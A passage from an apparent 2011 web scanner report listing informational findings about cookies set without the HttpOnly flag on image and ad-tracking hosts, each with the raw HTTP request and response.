X-Server-Name-And-Port: img211.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=bea29fd082ba49ca9dbf1c65e168a013; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.....v.v.......4......................................................................................................    .......................................................................
...[SNIP]...

14.43. http://img262.imageshack.us/img262/3146/17ls3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img262.imageshack.us
Path:   /img262/3146/17ls3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img262/3146/17ls3.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: img262.imageshack.us

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 24 Apr 2011 12:36:27 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 67776
Last-Modified: Sun, 06 Apr 2008 21:39:23 GMT
X-Server-Name-And-Port: img262.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=9c5e791d8287483a99eb3be054c25116; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......H.X.."..............................
...[SNIP]...

14.44. http://kroogy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-transform
Vary: User-Agent,Accept,Accept-Encoding
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:25:28 GMT; path=/
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
Content-Length: 28083

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Kroogy Search - Home</title>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...

14.45. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=lifelock1_cs=1&betq=4353=380320 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=vK5sN5pqHIxFG8povgg3sYARSKMCItdxvhQ3WX8bIMa4F/GCKGexvhQ3gZ8b1qKCaMrBEV7qIEysG/WkBgAoNXAc; GUID=MTMwMzYxNDEyNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=562283&t=2
Set-Cookie: C2=wQ5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAc; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: GUID=MTMwMzYxNDUxMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 24 Apr 2011 04:08:32 GMT
Content-Length: 0


14.46. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20016;evt=13529;cat1=13666;cat2=15184 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=728800512746; lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; pluto=728800512746

Response

HTTP/1.1 302 Redirect
Date: Sun, 24 Apr 2011 03:08:32 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=RSh3CL6z3gEQmpS17AM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: pluto=728800512746; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT


14.47. http://partners.nextadnetwork.com/z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:10:06 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:10:06 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:06 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:06 GMT; path=/; domain=.directtrack.com
Location: http://www.kqzyfj.com/click-1911961-10751987?sid=gid9a identity theft resource_ordering34--2011-04-23--20-10-04CD1&url=https%3A%2F%2Fwww.econsumer.equifax.com%2Fconsumer%2Flanding.ehtml%3F%255estart%3D%26companyName%3Dcj_esnp3r
X-Server-Name: www@dc1dtweb16
Content-Length: 0
Content-Type: text/html


14.48. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/371/CD1/id4+106163471 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:50 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb107
Content-Length: 477
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471CD1&c2=CD1">
<script type="text/javascript">function redirect() {if(doc
...[SNIP]...

14.49. http://partners.nextadnetwork.com/z/48/CD1/945440258  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/48/CD1/945440258

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/48/CD1/945440258 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:57 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:57 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:57 GMT; path=/; domain=.directtrack.com
Location: https://secure.lifelock.com/enrollmentform.aspx?promocode=next&uid=945440258CD1
X-Server-Name: www@dc1dtweb168
Content-Length: 0
Content-Type: text/html


14.50. http://partners.nextadnetwork.com/z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:10:02 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:10:02 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:02 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:02 GMT; path=/; domain=.directtrack.com
Location: http://www.nextadvisor.com/pmid?kw=id gid9a identity theft resource_ordering34--2011-04-23--20-10-01CD1
X-Server-Name: www@dc1dtweb59
Content-Length: 0
Content-Type: text/html


14.51. http://partners.nextadnetwork.com/z/518/CD1/idf+903230053  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/518/CD1/idf+903230053

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/518/CD1/idf+903230053 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:09:53 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:53 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:53 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:53 GMT; path=/; domain=.directtrack.com
Location: http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf 903230053CD1
X-Server-Name: www@dc1dtweb168
Content-Length: 0
Content-Type: text/html


14.52. http://pixel.mathtag.com/event/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102119&mt_adid=100377&v1=&v2=&v3=&s1=&s2=&s3=&ord=503629049 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303614126

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6317 25367
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 24 Apr 2011 03:08:32 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1303614512; domain=.mathtag.com; path=/; expires=Mon, 23-Apr-2012 03:08:32 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.53. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fd49cb9a7122f52 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; ses2=12801^1&12142^1; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C0%2C1%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fd49cb9a7122f52; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.54. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 12:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.801362.0XMC
Set-Cookie: C2=MMBtN5pqHIxFGQoovgg3sYQKSKMCItdxUhQ3WXMVIMa4FTFCKGexUhQ3gZMV1qKCaMrBpU7qIEysGTVkBgAoNXUVmZOiGgasjgAbUaUVNSPC73cBwB; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: 53765754=_4db4130c,4224517685,801362^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000801362/mnum=0000894
...[SNIP]...

14.55. http://roia.biz/im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://roia.biz
Path:   /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

Issue detail

